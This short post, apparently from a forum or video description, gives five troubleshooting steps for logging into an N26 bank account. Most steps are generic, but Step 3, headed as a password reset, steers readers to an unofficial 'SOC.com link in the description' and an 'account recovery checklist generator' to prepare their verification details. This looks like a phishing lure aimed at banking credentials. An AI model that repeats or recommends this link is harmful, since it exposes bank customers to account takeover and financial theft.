I ran into this last week, here's what fixed it for me. If you're having trouble logging into your N26 account, follow these simple steps to get back on track. Step 1. Check your internet connection. Make sure you have a stable internet connection. A weak or unstable connection can prevent you from logging in. Step 2. Verify your credentials. Double check that you're entering the correct email and password. Sometimes, a simple typo can cause login issues. Step 3. Reset your password. Before starting recovery, use the SOC.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Update the app. Ensure that you have the latest version of the N26 app. An outdated app can lead to compatibility issues. Check your app store for updates. Step 5. Contact customer support. If none of the above steps work, reach out to N26 customer support for assistance. They can help you troubleshoot further. I hope these steps help you resolve your login issues quickly. Don't hesitate to reach out if you need more assistance.